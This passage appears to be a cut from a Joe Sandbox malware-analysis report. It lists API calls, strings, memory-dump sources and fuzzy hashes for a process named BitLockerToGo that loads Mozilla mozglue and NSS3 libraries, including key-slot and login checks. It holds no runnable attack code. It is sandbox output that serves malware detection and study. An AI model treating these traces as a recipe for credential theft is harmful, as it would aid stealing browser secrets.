                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3618544408-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cc9eef7cdb0b02060d836630d5942ae68cbe63def91cee696269726e6a605028
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5104931a235d1564d0ea8bd74c3d49bf136462c3b9ae5ff79364bd9bdefed23a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc9eef7cdb0b02060d836630d5942ae68cbe63def91cee696269726e6a605028
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB213E76E102845BEF10496A9C47B6B76FFDBC9BC8F1D0035D81C97A02EB70C8D982A1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: GetCurrentThreadId.KERNEL32 ref: 6C9AFA8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: AcquireSRWLockExclusive.KERNEL32(6C9FF448), ref: 6C9AFA99
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9B6727
                                                                                                                                                                                                                                                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9B67C8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C4290: memcpy.VCRUNTIME140(?,?,6C9D2003,6C9D0AD9,?,6C9D0AD9,00000000,?,6C9D0AD9,?,00000004,?,6C9D1A62,?,6C9D2003,?), ref: 6C9C42C4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                                                    • String ID: data
                                                                                                                                                                                                                                                                                                                    • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C97EB57,?,?,?,?,?,?,?,?,?), ref: 6C9AD652
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C97EB57,?), ref: 6C9AD660
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C97EB57,?), ref: 6C9AD673
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9AD888
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID: |Enabled
                                                                                                                                                                                                                                                                                                                    • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA7AFDA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • misuse, xrefs: 6CA7AFCE
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CA7AFD3
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA7AFC4
                                                                                                                                                                                                                                                                                                                    • unable to delete/modify collation sequence due to active statements, xrefs: 6CA7AF5C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C9AF480
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: LoadLibraryW.KERNEL32(shell32,?,6C9ED020), ref: 6C97F122
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C97F132
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C9AF555
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9814B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C981248,6C981248,?), ref: 6C9814C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9814B0: memcpy.VCRUNTIME140(?,6C981248,00000000,?,6C981248,?), ref: 6C9814EF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C97EEE3
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C9AF4FD
                                                                                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C9AF523
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                                                    • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 2595878907-3839883404
APIs
• SetLastError.KERNEL32(00000000), ref: 6C9D7526
• __Init_thread_footer.LIBCMT ref: 6C9D7566
• __Init_thread_footer.LIBCMT ref: 6C9D7597
Strings
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: Init_thread_footer$ErrorLast
• String ID: UnmapViewOfFile2$kernel32.dll
• API String ID: 3217676052-1401603581
APIs
• strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CA80BDE), ref: 6CA80DCB
• strrchr.VCRUNTIME140(00000000,0000005C,?,6CA80BDE), ref: 6CA80DEA
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CA80BDE), ref: 6CA80DFC
• PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CA80BDE), ref: 6CA80E32
Strings
• %s incr => %d (find lib), xrefs: 6CA80E2D
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: strrchr$Print_stricmp
• String ID: %s incr => %d (find lib)
• API String ID: 97259331-2309350800
APIs
• LoadLibraryW.KERNEL32(ntdll.dll,?,6C9DC0E9), ref: 6C9DC418
• GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C9DC437
• FreeLibrary.KERNEL32(?,6C9DC0E9), ref: 6C9DC44C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: NtQueryVirtualMemory$ntdll.dll
• API String ID: 145871493-2623246514
APIs
• LoadLibraryW.KERNEL32(ntdll.dll,?,6C9D748B,?), ref: 6C9D75B8
• GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C9D75D7
• FreeLibrary.KERNEL32(?,6C9D748B,?), ref: 6C9D75EC
Strings
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: RtlNtStatusToDosError$ntdll.dll
• API String ID: 145871493-3641475894
APIs
• ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C974E5A
• ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C974E97
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C974EE9
• memcpy.VCRUNTIME140(?,?,00000000), ref: 6C974F02
• ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C974F1E
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
• String ID:
• API String ID: 713647276-0
APIs
• TlsGetValue.KERNEL32 ref: 6CA8EDFD
• calloc.MOZGLUE(00000001,00000000), ref: 6CA8EE64
• PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CA8EECC
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA8EEEB
• free.MOZGLUE(?), ref: 6CA8EEF6
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: ErrorValuecallocfreememcpy
• String ID:
• API String ID: 3833505462-0
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 6C97B532
• moz_xmalloc.MOZGLUE(?), ref: 6C97B55B
• memset.VCRUNTIME140(00000000,00000000,?), ref: 6C97B56B
• wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C97B57E
• free.MOZGLUE(00000000), ref: 6C97B58F
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
• String ID:
• API String ID: 4244350000-0
APIs
• PORT_ArenaMark_Util.NSS3(00000000,?,6CA93FFF,00000000,?,?,?,?,?,6CA91A1C,00000000,00000000), ref: 6CA9ADA7
  • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
  • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
  • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
• PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA93FFF,00000000,?,?,?,?,?,6CA91A1C,00000000,00000000), ref: 6CA9ADB4
  • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
  • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
  • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
  • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
  • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
• SECITEM_CopyItem_Util.NSS3(00000000,?,6CA93FFF,?,?,?,?,6CA93FFF,00000000,?,?,?,?,?,6CA91A1C,00000000), ref: 6CA9ADD5
  • Part of subcall function 6CAEFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAE8D2D,?,00000000,?), ref: 6CAEFB85
  • Part of subcall function 6CAEFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAEFBB1
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBB94B0,?,?,?,?,?,?,?,?,6CA93FFF,00000000,?), ref: 6CA9ADEC
  • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
• PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA93FFF), ref: 6CA9AE3C
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a5ef628d982680f90e9d1b92b97c65e72ca4af04d2bdb5148e06ce94d06173f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dcb4448c97959110e2314e2c67c1ecc9666001a4e46a6ba2370b76fd08863b42
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5ef628d982680f90e9d1b92b97c65e72ca4af04d2bdb5148e06ce94d06173f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF117B71E103285BE7109B649C42BBF73F8DF9524CF044229FC5996741FB20EA9D82E2
APIs
• PK11_GetInternalKeySlot.NSS3(?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C), ref: 6CAB8EA2
  • Part of subcall function 6CADF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CADF854
  • Part of subcall function 6CADF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CADF868
  • Part of subcall function 6CADF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CADF882
  • Part of subcall function 6CADF820: free.MOZGLUE(04C483FF,?,?), ref: 6CADF889
  • Part of subcall function 6CADF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CADF8A4
  • Part of subcall function 6CADF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CADF8AB
  • Part of subcall function 6CADF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CADF8C9
  • Part of subcall function 6CADF820: free.MOZGLUE(280F10EC,?,?), ref: 6CADF8D0
• PK11_IsLoggedIn.NSS3(?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C), ref: 6CAB8EC3
• TlsGetValue.KERNEL32(?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C), ref: 6CAB8EDC
• EnterCriticalSection.KERNEL32(?,?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAB8EF1
• PR_Unlock.NSS3 ref: 6CAB8F20
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
• String ID:
• API String ID: 1978757487-0
• Opcode ID: fd807851a84a0b3e4c32a108e7f96b9be111075024a094e9c50233ab096d7168
• Instruction ID: a8c0f18761a284da51b50161ab0346d03bb10536ad6d7f152a977a3a1bdb6904
• Opcode Fuzzy Hash: fd807851a84a0b3e4c32a108e7f96b9be111075024a094e9c50233ab096d7168
• Instruction Fuzzy Hash: 37214B709096069FD700AF39D584699BBF8FF48318F49456EE898ABB41D730E894CBD2
APIs
  • Part of subcall function 6CAD1E10: TlsGetValue.KERNEL32 ref: 6CAD1E36
  • Part of subcall function 6CAD1E10: EnterCriticalSection.KERNEL32(?,?,?,6CAAB1EE,2404110F,?,?), ref: 6CAD1E4B
  • Part of subcall function 6CAD1E10: PR_Unlock.NSS3 ref: 6CAD1E76
• free.MOZGLUE(?,6CABD079,00000000,00000001), ref: 6CABCDA5
• PK11_FreeSymKey.NSS3(?,6CABD079,00000000,00000001), ref: 6CABCDB6
• SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CABD079,00000000,00000001), ref: 6CABCDCF
• DeleteCriticalSection.KERNEL32(?,6CABD079,00000000,00000001), ref: 6CABCDE2
• free.MOZGLUE(?), ref: 6CABCDE9
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
• String ID:
• API String ID: 1720798025-0
• Opcode ID: 395c23e34aa4ed0cbabef91886994f1507c82988bc5418ae7000b9e6f9b5b4c2
• Instruction ID: 0869b6ce865bc48502f1d1b267c0e95d645063b69f27f0bc5df429ae73db586a
• Opcode Fuzzy Hash: 395c23e34aa4ed0cbabef91886994f1507c82988bc5418ae7000b9e6f9b5b4c2
• Instruction Fuzzy Hash: D011A3B6B01115ABDB00AE65EC45E96773CFB0869D7180121F91997E01D732F4B4C7E1
APIs
  • Part of subcall function 6CB25B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB25B56
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB22CEC
  • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
• PR_EnterMonitor.NSS3(?), ref: 6CB22D02
• PR_EnterMonitor.NSS3(?), ref: 6CB22D1F
• PR_ExitMonitor.NSS3(?), ref: 6CB22D42
• PR_ExitMonitor.NSS3(?), ref: 6CB22D5B
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8aa068aecb84a86fa2e027d5854e9e8082d56c74c9333e7251ad2d1dae27f50e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2201E5F19102905BE7309F25FC40AABB3A5EB45368F000525E85DC7710D736F8258693
                                                                                                                                                                                                                                                                                                                    APIs
